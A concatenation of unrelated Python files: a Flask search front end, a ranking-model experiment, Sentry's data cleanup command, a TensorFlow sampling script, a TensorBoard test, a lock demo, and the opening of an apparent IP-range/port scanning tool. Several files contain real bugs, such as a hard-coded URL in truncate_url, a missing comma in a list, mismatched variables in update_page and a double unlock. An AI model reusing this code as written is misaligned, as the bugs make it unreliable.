previous_search_res = list(zip(search_titles, search_abstracts, urls))
previous_search_res_abs = previous_search_res.copy()
search_res = previous_search_res[start:start + hits]
search_time = round(end_time - start_time, 2)
previous_search_time = search_time
print("search first over")
t1 = threading.Thread(target=update_page)
t1.start()
update_page_Flag = False
except:
return "Error, check your installastion"
# get data and compute range of results pages
i = int(start / hits)
maxi = 4
range_pages = range(i - 5, i + 5 if i + 5 < maxi else maxi) if i >= 6 else range(0,
maxi if maxi < 10 else 10)
# show the list of matching results
previous_query = query
current_start, current_hits = start, hits
return render_template('spatial/index.html', query=query,
response_time=search_time,
total=top_k,
hits=hits,
start=start,
range_pages=range_pages,
page=i,
search_res=search_res,
maxpage=max(range_pages))
# return homepage (no query)
return render_template('spatial/index.html')
def update_page():
if not update_page_Flag:
return
global search_titles, previous_search_res_abs
search_abstracts = get_abstracts(doc_names=search_titles[0:5])
urls = get_urls(doc_names=search_titles)
# previous_search_res_abs = list(zip(search_titles[0:5], search_abstracts, urls)) + previous_search_res[5:]
previous_search_res_abs[0:5] = list(zip(search_titles[0:5], search_abstracts, urls))
print("First layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
search_abstracts_2layer = get_abstracts(doc_names=search_titles[5:10])
urls_2layer = get_urls(doc_names=search_titles)
previous_search_res_abs[5:10] = list(zip(search_titles[5:10], search_abstracts_2layer, urls_2layer))
print("Second layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
search_abstracts_3layer = get_abstracts(doc_names=search_titles[10:15])
urls_2layer = get_urls(doc_names=search_titles)
previous_search_res_abs[10:15] = list(zip(search_titles[10:15], search_abstracts_2layer, urls_2layer))
print("Third layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
search_abstracts_4layer = get_abstracts(doc_names=search_titles[15:20])
urls_2layer = get_urls(doc_names=search_titles)
previous_search_res_abs[15:20] = list(zip(search_titles[15:20], search_abstracts_2layer, urls_2layer))
print("Fourth layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
# search_abstracts = get_abstracts(doc_names=search_titles)
# urls = get_urls(doc_names=search_titles)
# previous_search_res_abs = list(zip(search_titles, search_abstracts, urls))
# print("Abstracts have been obtained")
# print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
@app.route("/", methods=['POST'])
def abstract():
"""
URL : /
Query engine to find a list of relevant URLs.
Method : POST or GET (no query)
Form data :
- query : the search query
- hits : the number of hits returned by query
- start : the start of hits
Return a template view with the list of relevant URLs.
"""
global abstract_Flag, previous_search_res_abs, previous_search_res, previous_search_time, previous_query
global current_start, current_hits
# GET data
print("into abstract function")
query = request.args.get("query", None)
top_k = int(request.args.get("top_k", type=int, default=20))
doc_name = request.args.get("doc_name", type=str, default=None)
start = current_start
hits = current_hits
print("start", start)
print("hits", hits)
if start < 0 or hits < 0:
return "Error, start or hits cannot be negative numbers"
try:
print("abstract_Flag", abstract_Flag)
search_time = previous_search_time
if abstract_Flag:
search_res = list(previous_search_res_abs)[start:start + hits]
else:
search_res = list(previous_search_res)[start:start + hits]
abstract_Flag = not abstract_Flag
except:
return "Error, check your installation"
# get data and compute range of results pages
i = int(start / hits)
maxi = 4
range_pages = range(i - 5, i + 5 if i + 5 < maxi else maxi) if i >= 6 else range(0, maxi if maxi < 10 else 10)
# show the list of matching results
return render_template('spatial/index.html', query=previous_query,
response_time=previous_search_time,
total=top_k,
hits=hits,
start=start,
range_pages=range_pages,
page=i,
search_res=search_res,
maxpage=max(range_pages))
@app.route("/reference", methods=['POST'])
def reference():
"""
URL : /reference
Request the referencing of a website.
Method : POST
Form data :
- url : url to website
- email : contact email
Return homepage.
"""
# POST data
data = dict((key, request.form.get(key)) for key in request.form.keys())
if not data.get("url", False) or not data.get("email", False):
return "Vous n'avez pas renseigné l'URL ou votre email."
# query search engine
try:
r = requests.post('http://%s:%s/reference' % (host, port), data={
'url': data["url"],
'email': data["email"]
})
except:
return "Une erreur s'est produite, veuillez réessayer ultérieurement"
return "Votre demande a bien été prise en compte et sera traitée dans les meilleurs délais."
# -- JINJA CUSTOM FILTERS -- #
@app.template_filter('truncate_title')
def truncate_title(title):
"""
Truncate title to fit in result format.
"""
return title if len(title) <= 70 else title[:70] + "..."
@app.template_filter('truncate_description')
def truncate_description(description):
"""
Truncate description to fit in result format.
"""
if len(description) <= 160:
return description
cut_desc = ""
character_counter = 0
for i, letter in enumerate(description):
character_counter += 1
if character_counter > 160:
if letter == ' ':
return cut_desc + "..."
else:
return cut_desc.rsplit(' ', 1)[0] + "..."
cut_desc += description[i]
return cut_desc
@app.template_filter('truncate_url')
def truncate_url(url):
"""
Truncate url to fit in result format.
"""
# url = parse.unquote(url)
url = 'https://www.begtut.com/python/ref-requests-post.html'
if len(url) <= 60:
return url
url = url[:-1] if url.endswith("/") else url
url = url.split("//", 1)[1].split("/")
url = "%s/.../%s" % (url[0], url[-1])
return url[:60] + "..." if len(url) > 60 else url
return app
if __name__ == '__main__':
print("docs loaded:", len(permuterm), len(permuterm.keys()))
app = create_app()
app.run()
|
run_PDGD_batch_update.py
|
# experiments run for PDGD updating in batch (single client)
import os
import sys
sys.path.append('../')
from data.LetorDataset import LetorDataset
from ranker.PDGDLinearRanker import PDGDLinearRanker
from clickModel.SDBN import SDBN
from clickModel.PBM import PBM
from utils import evl_tool
import numpy as np
import multiprocessing as mp
import pickle
from tqdm import tqdm
def run(train_set, test_set, ranker, num_interation, click_model, batch_size, seed):
# initialise
offline_ndcg_list = []
online_ndcg_list = []
query_set = train_set.get_all_querys()
np.random.seed(seed)
index = np.random.randint(query_set.shape[0], size=num_interation)
num_iter = 0
gradients = np.zeros(train_set._feature_size)
# update in interactions
for i in index: # interaction
num_iter += 1
# one interaction (randomly choose a query from dataset)
qid = query_set[i]
result_list, scores = ranker.get_query_result_list(train_set, qid)
clicked_doc, click_label, _ = click_model.simulate(qid, result_list, train_set)
# accumulate gradients in batch
gradients += ranker.update_to_clicks(click_label, result_list, scores, train_set.get_all_features_by_query(qid), return_gradients=True)
# online evaluation
online_ndcg = evl_tool.query_ndcg_at_k(train_set, result_list, qid, 10) # ndcg@k evaluation on training_set (use ture relevance label)
online_ndcg_list.append(online_ndcg)
# offline evaluation (to the current ranker)
all_result = ranker.get_all_query_result_list(test_set)
offline_ndcg = evl_tool.average_ndcg_at_k(test_set, all_result, 10) # off-line ndcg evaluation on test_set of each batch
offline_ndcg_list.append(offline_ndcg)
if num_iter % batch_size == 0:
# update ranker in batches
ranker.update_to_gradients(gradients) # get weights updated
gradients = np.zeros(train_set._feature_size)
final_weights = ranker.get_current_weights()
return offline_ndcg_list, online_ndcg_list, final_weights
def job(model_type, f, train_set, test_set, output_fold, batch_size, pc, ps):
cm = SDBN(pc, ps) # pc: click probability, ps: stop probability
for seed in tqdm(range(1, 6)):
ranker = PDGDLinearRanker(FEATURE_SIZE, Learning_rate)
print("\n", "PDGD fold{} {} run{} start!".format(f, model_type, seed), "\n")
offline_ndcg, online_ndcg, final_weights = run(train_set, test_set, ranker, NUM_INTERACTION, cm, batch_size, seed)
os.makedirs(os.path.dirname("{}/fold{}/".format(output_fold, f)),
exist_ok=True) # create directory if not exist
with open(
"{}/fold{}/{}_run{}_offline_ndcg.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(offline_ndcg, fp)
with open(
"{}/fold{}/{}_run{}_online_ndcg.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(online_ndcg, fp)
with open(
"{}/fold{}/{}_run{}_weights.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(final_weights, fp)
print("\n", "PDGD fold{} {} run{} finished!".format(f, model_type, seed), "\n")
if __name__ == "__main__":
NUM_INTERACTION = 8000000
click_models = ["informational", "navigational", "perfect"]
Learning_rate = 0.1
batch_sizes = [800]
datasets = ["MQ2007"] # ["MQ2007", "MSLR10K"]
mslr10k_fold = "../datasets/MSLR10K"
mslr10k_output = "../results/PDGD/MSLR10K/MSLR10K_batch_update_size{}_grad_add_total{}"
mq2007_fold = "../datasets/MQ2007"
mq2007_output = "../results/PDGD/MQ2007/MQ2007_batch_update_size{}_grad_add_total{}"
mq2008_fold = "../datasets/MQ2008"
mq2008_output = "../results/PDGD/MQ2008/MQ2008_batch_update_size{}_grad_add_total{}"
Yahoo_fold = "../datasets/Yahoo"
Yahoo_output = "../results/PDGD/yahoo/yahoo_batch_update_size{}_grad_add_total{}"
dataset_root_dir = "../datasets"
output_root_dir = "../results"
cache_path = "../datasets/cache"
for batch_size in batch_sizes:
for dataset in datasets:
output_fold = f"{output_root_dir}/PDGD/{dataset}/{dataset}_PDGD_batch_update_size{batch_size}_grad_add_total{NUM_INTERACTION}"
paths = [
(mslr10k_fold, mslr10k_output.format(batch_size, NUM_INTERACTION))
(mq2007_fold, mq2007_output.format(batch_size, NUM_INTERACTION))
# (mq2008_fold, mq2008_output.format(batch_size, NUM_INTERACTION)),
# (Yahoo_fold, Yahoo_output.format(batch_size, NUM_INTERACTION))
]
for path in paths:
dataset_fold = path[0]
output_fold = path[1]
processors = []
for click_model in tqdm(click_models):
# adding parameters based on different datasets and click_model
# (feature_size, normalization, fold_range, clicking probability, stopping probability)
if dataset_fold == "../datasets/MSLR10K":
FEATURE_SIZE = 136
norm = True
fold_range = range(1, 6)
if click_model == "perfect":
pc = [0.0, 0.2, 0.4, 0.8, 1.0]
ps = [0.0, 0.0, 0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.3, 0.5, 0.7, 0.95]
ps = [0.2, 0.3, 0.5, 0.7, 0.9]
elif click_model == "informational":
pc = [0.4, 0.6, 0.7, 0.8, 0.9]
ps = [0.1, 0.2, 0.3, 0.4, 0.5]
elif dataset_fold == "../datasets/MQ2007" or dataset_fold == "../datasets/MQ2008":
FEATURE_SIZE = 46
norm = False
fold_range = range(1, 6)
if click_model == "perfect":
pc = [0.0, 0.5, 1.0]
ps = [0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.5, 0.95]
ps = [0.2, 0.5, 0.9]
elif click_model == "informational":
pc = [0.4, 0.7, 0.9]
ps = [0.1, 0.3, 0.5]
elif dataset_fold == "../datasets/Yahoo":
FEATURE_SIZE = 700
norm = False
fold_range = range(1, 2)
if click_model == "perfect":
pc = [0.0, 0.2, 0.4, 0.8, 1.0]
ps = [0.0, 0.0, 0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.3, 0.5, 0.7, 0.95]
ps = [0.2, 0.3, 0.5, 0.7, 0.9]
elif click_model == "informational":
pc = [0.4, 0.6, 0.7, 0.8, 0.9]
ps = [0.1, 0.2, 0.3, 0.4, 0.5]
for f in tqdm(fold_range):
train_path = "{}/Fold{}/train.txt".format(dataset_fold, f)
test_path = "{}/Fold{}/test.txt".format(dataset_fold, f)
train_set = LetorDataset(train_path, FEATURE_SIZE, query_level_norm=norm, cache_root=cache_path)
test_set = LetorDataset(test_path, FEATURE_SIZE, query_level_norm=norm, cache_root=cache_path)
print(dataset_fold, click_model, f, batch_size)
p = mp.Process(target=job, args=(click_model, f, train_set, test_set, output_fold, batch_size, pc, ps))
p.start()
processors.append(p)
for p in processors:
p.join()
|
thread_caching.py
|
import typing as t
from itertools import count
from threading import Lock, Thread
import outcome
IDLE_TIMEOUT = 10
name_counter = count()
class WorkerThread:
def __init__(self, thread_cache: t.Any) -> None:
self._job = None
self._thread_cache = thread_cache
self._worker_lock = Lock()
self._worker_lock.acquire()
thread = Thread(target=self._work, daemon=True)
thread.name = f"Worker thread {next(name_counter)}"
thread.start()
def _work(self) -> None:
while True:
if self._worker_lock.acquire(timeout=IDLE_TIMEOUT):
fn, deliver = self._job
self._job = None
result = outcome.capture(fn)
self._thread_cache._idle_workers[self] = None
deliver(result)
del fn
del deliver
else:
try:
del self._thread_cache._idle_workers[self]
except KeyError:
continue
else:
return
class ThreadCache:
def __init__(self) -> None:
self._idle_workers = {}
def start_thread_soon(self, fn: t.Callable, deliver: t.Any) -> None:
try:
worker, _ = self._idle_workers.popitem()
except KeyError:
worker = WorkerThread(self)
worker._job = (fn, deliver)
worker._worker_lock.release()
THREAD_CACHE = ThreadCache()
def start_thread_soon(fn: t.Any, deliver: t.Any) -> None:
THREAD_CACHE.start_thread_soon(fn, deliver)
|
cleanup.py
|
"""
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
this is 30 days. In the default setting all projects will be truncated
but if you have a specific project you want to limit this to this can be
done with the `--project` flag which accepts a project ID or a string
with the form `org/project` where both are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
os.environ['_SENTRY_CLEANUP'] = '1'
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.app import nodestore
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
if is_filtered(models.OrganizationMember) and not silent:
click.echo('>> Skipping OrganizationMember')
else:
click.echo('Removing expired values for OrganizationMember')
expired_threshold = timezone.now() - timedelta(days=days)
models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
model.objects.filter(expires_at__lt=timezone.now()).delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
else:
if not silent:
click.echo("Removing old NodeStore values")
cutoff = timezone.now() - timedelta(days=days)
try:
nodestore.cleanup(cutoff)
except NotImplementedError:
click.echo(
"NodeStore backend does not support cleanup operation", err=True)
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
|
fit_switch.py
|
import threading
import tensorflow_probability as tfp
import numpy as np
import tensorflow as tf
import time
import pickle
import pandas as pd
np.set_printoptions(suppress=True,precision=3)
import sys
from tensorflow_probability import distributions as tfd
from move_ns import moveNS
def setup_and_run_hmc(threadid):
np.random.seed(threadid)
tf.random.set_seed(threadid)
def sp(x):
# softplus transform with shift
return tf.nn.softplus(x)+1e-4
def rbf_kernel(x1):
# RBF kernel with single variable parameter. Other parameters are set
# to encode lengthscale of 20 days
return tfp.math.psd_kernels.ExponentiatedQuadratic(x1,np.float(2.0))
# initial value of kernel amplitude
lparams_init=[0.0, 3.0]
aparams_init=[0.0]
# transform for parameter to ensure positive
transforms=[sp]
# prior distribution on parameter
lpriors = [tfd.Normal(loc = np.float64(0.),scale=np.float64(5.)),
tfd.Normal(loc=np.float64(3.), scale=np.float64(1))]
# tfd.Normal(loc=np.float64(0.), scale=np.float64(10.0))]
apriors = [tfd.Normal(loc = np.float64(0.),scale=np.float64(5.))]
# create the model
mover = moveNS(T,X,Z, ID, BATCH_SIZE=1460, velocity=True,
#akernel=rbf_kernel,
aparams_init=aparams_init,
apriors=apriors,
#atransforms=transforms,
lkernel=rbf_kernel,
lparams_init=lparams_init,
lpriors=lpriors,
ltransforms=transforms,
mean_obs_noise=-5, std_obs_noise=1.0)
def build_trainable_location_scale_distribution(initial_loc, initial_scale):
with tf.name_scope('build_trainable_location_scale_distribution'):
dtype = tf.float32
initial_loc = initial_loc * tf.ones(tf.shape(initial_scale), dtype=dtype)
initial_scale = tf.nn.softplus(initial_scale * tf.ones_like(initial_loc))
loc = tf.Variable(initial_value=initial_loc, name='loc')
scale=tfp.util.TransformedVariable(tf.Variable(initial_scale, name='scale'), tfp.bijectors.Softplus())
posterior_dist = tfd.Normal(loc=loc, scale=scale)
posterior_dist = tfd.Independent(posterior_dist)
return posterior_dist
flat_component_dists = []
for kparam in mover.kernel_params:
init_loc = kparam
init_scale = tf.random.uniform(shape=kparam.shape, minval=-2, maxval=2, dtype=tf.dtypes.float32)
flat_component_dists.append(build_trainable_location_scale_distribution(init_loc,init_scale))
surrogate_posterior = tfd.JointDistributionSequential(flat_component_dists)
def target_log_prob_fn(*inputs):
params = [tf.squeeze(a) for a in inputs]
loss = mover.log_posterior(*params)
return loss
start = time.time()
losses = tfp.vi.fit_surrogate_posterior(target_log_prob_fn, surrogate_posterior,optimizer=tf.optimizers.Adam(learning_rate=0.1, beta_2=0.9), num_steps=5000)
steps = []
max_step = 0.0
for i in range(len(mover.kernel_params)):
stdstep = surrogate_posterior.stddev()[i].numpy()
meanp = surrogate_posterior.mean()[i].numpy()
mover.kernel_params[i].assign(meanp)
if stdstep.max()>max_step:
max_step = stdstep.max()
steps.append(stdstep)
steps = [(1e-2/max_step)*s for s in steps]
start = time.time()
# sample from the posterior
num_samples=200#4000
burn_in=500
kr = mover.hmc_sample(num_samples=num_samples, skip=8, burn_in=burn_in, init_step=steps)
print(np.sum(kr.inner_results.is_accepted.numpy()/num_samples))
# sample from the posterior
#mover.hmc_sample(num_samples=2000, skip=0, burn_in=1000)
end = time.time()
lengths = mover.get_lengthscale_samples(X=pZ)
np.save('data/length_switch_' + str(threadid) + '.npy',lengths)
amps = mover.get_amplitude_samples()
np.save('data/amp_switch_' + str(threadid) + '.npy',amps)
for i in range(len(mover.kernel_params)):
output = mover.samples_[i].numpy()
np.save('data/all_switch_' + str(i) + '_' + str(threadid) + '.npy',output)
print(threadid,end - start)
def parallel_run(threadid, gpu):
with tf.name_scope(gpu):
with tf.device(gpu):
setup_and_run_hmc(threadid)
return
df = pd.read_csv('data/switch.csv',index_col=0)
X = df[['Latitude','Longitude']].values
ID = df['Animal'].values
secs =(pd.to_datetime(df['Date'])- pd.datetime(2000,1,1)).dt.seconds.astype(float).values
days = (pd.to_datetime(df['Date'])- pd.datetime(2000,1,1)).dt.days.astype(float).values
T = (days*24*60+secs/60)/(60*24)
T = T-T[0]
T=T[:,None]
uT = np.unique(T).copy()
z_skip=10
Z = uT[::z_skip,None].copy()
pZ = uT[::z_skip,None].copy()
np.random.shuffle(Z)
gpu_list = tf.config.experimental.list_logical_devices('GPU')
num_threads = len(gpu_list)
print(num_threads)
threads = list()
start = time.time()
for index in range(num_threads):
x = threading.Thread(target=parallel_run, args=(index,gpu_list[index].name))
threads.append(x)
x.start()
for index, thread in enumerate(threads):
thread.join()
end = time.time()
print('Threaded time taken: ', end-start)
|
server_ingester_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for `tensorboard.data.server_ingester`."""
import os
import subprocess
import tempfile
import threading
import time
from unittest import mock
import grpc
from tensorboard import test as tb_test
from tensorboard.data import grpc_provider
from tensorboard.data import server_ingester
from tensorboard.util import grpc_util
class ExistingServerDataIngesterTest(tb_test.TestCase):
def test(self):
addr = "localhost:6806"
with mock.patch.object(grpc, "secure_channel", autospec=True):
ingester = server_ingester.ExistingServerDataIngester(
addr,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
class SubprocessServerDataIngesterTest(tb_test.TestCase):
def test(self):
# Create a fake server binary so that the `os.path.exists` check
# passes.
fake_binary_path = os.path.join(self.get_temp_dir(), "server")
with open(fake_binary_path, "wb"):
pass
binary_info = server_ingester.ServerBinary(
fake_binary_path, version=None
)
tmpdir = tempfile.TemporaryDirectory()
self.enter_context(
mock.patch.object(
tempfile, "TemporaryDirectory", return_value=tmpdir
)
)
port_file = os.path.join(tmpdir.name, "port")
error_file = os.path.join(tmpdir.name, "startup_error")
real_popen = subprocess.Popen
# Stub out `subprocess.Popen` to write the port file.
def fake_popen(subprocess_args, *args, **kwargs):
def target():
time.sleep(0.2) # wait one cycle
with open(port_file, "w") as outfile:
outfile.write("23456\n")
result = mock.create_autospec(real_popen, instance=True)
result.stdin = mock.Mock()
result.poll = lambda: None
result.pid = 789
threading.Thread(target=target).start()
return result
tilde_logdir = "~/tmp/logs"
expanded_logdir = os.path.expanduser(tilde_logdir)
self.assertNotEqual(tilde_logdir, expanded_logdir)
with mock.patch.object(subprocess, "Popen", wraps=fake_popen) as popen:
with mock.patch.object(grpc, "secure_channel", autospec=True) as sc:
ingester = server_ingester.SubprocessServerDataIngester(
server_binary=binary_info,
logdir=tilde_logdir,
reload_interval=5,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
samples_per_plugin={
"scalars": 500,
"images": 0,
},
extra_flags=["--extra-flags", "--for-fun"],
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
expected_args = [
fake_binary_path,
"--logdir=%s" % expanded_logdir,
"--reload=5",
"--samples-per-plugin=scalars=500,images=all",
"--port=0",
"--port-file=%s" % port_file,
"--die-after-stdin",
"--error-file=%s" % error_file,
"--verbose", # logging is enabled in tests
"--extra-flags",
"--for-fun",
]
popen.assert_called_once_with(expected_args, stdin=subprocess.PIPE)
sc.assert_called_once_with(
"localhost:23456", mock.ANY, options=mock.ANY
)
class ServerInfoTest(tb_test.TestCase):
def test_version_none(self):
b = server_ingester.ServerBinary("./server", version=None)
self.assertTrue(b.at_least_version("0.1.0"))
self.assertTrue(b.at_least_version("999.999.999"))
def test_version_final_release(self):
b = server_ingester.ServerBinary("./server", version="0.4.0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertFalse(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
def test_version_prerelease(self):
b = server_ingester.ServerBinary("./server", version="0.5.0a0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertTrue(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
if __name__ == "__main__":
tb_test.main()
|
use_case_one.py
|
from distrilockper import Config
from distrilockper.lock_helper import DistributerLockHelper
config = Config()
config.use_single_server().set_config(host='0.0.0.0', port=6379)
helper = DistributerLockHelper()
helper.create(config)
class ticketSalse():
def __init__(self):
self.ticket_count = 1
def buy(self):
Locker1 = helper.get_reentrant_lock(key='ticketSalse')
re1 = Locker1.try_lock(2, 10, 'second')
print("get lock:", re1)
if re1:
if self.ticket_count > 0:
self.ticket_count -= 1
print("sale one, remain: ", self.ticket_count)
Locker1.unlock()
Locker1.unlock()
else:
print("get lock failed")
print(self.ticket_count)
def ticket_num(self):
print(self.ticket_count)
import threading
import time
sale = ticketSalse()
threads = []
for i in range(100):
print(i)
threads.append(threading.Thread(target = sale.buy))
threads[i].start()
|
main_whit_async.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from multiprocessing import Event,JoinableQueue,Pool,Process,Value,Queue
import io,os,sys,time,threading,queue,asyncio,socket,argparse
import pgbar,tracemalloc,ports_g,iprange_g
def eq_put_y(task,workers,procs):
if task == 0:
yield 0
if procs == 1:
for i in range(procs):
if task >= workers:
task-=workers
yield task
else:
yield 0
elif procs > 1:
for i in range(procs):
if task >= workers*procs:
task-=workers
yield task
elif task*procs >= workers/procs and task < workers*procs:
if task > procs:
task=task-(int(task/procs)+task%procs)
yield task
elif task < procs:
yield 0
elif task*procs < workers/procs:
yield 0
def eq_put_iprange(task,workers,procs,ipseed,wqport):
while True:
if task != 0:
while not eq.full():
if task == 0:
break
eg=eq_put_y(task,workers,procs)
eql=[]
#print('[eq_put_iprange]task =',task)
a=task;task=next(eg);c=a-task
#print('[eq_put_iprange]ipseed:',ipseed)
eql.append(ipseed)
ipseed=iprange_g.set_end(ipseed,c)
eql.append(c)
eql.append(wqport)
print('[eq_put_iprange]eql :',eql,'task=',task)
eq.put(eql)
elif task == 0:
break
ee.clear()
ee.wait()
def eq_put_iplist(task,workers,procs,ipseed,wqport):
while True:
if task != 0:
while not eq.full():
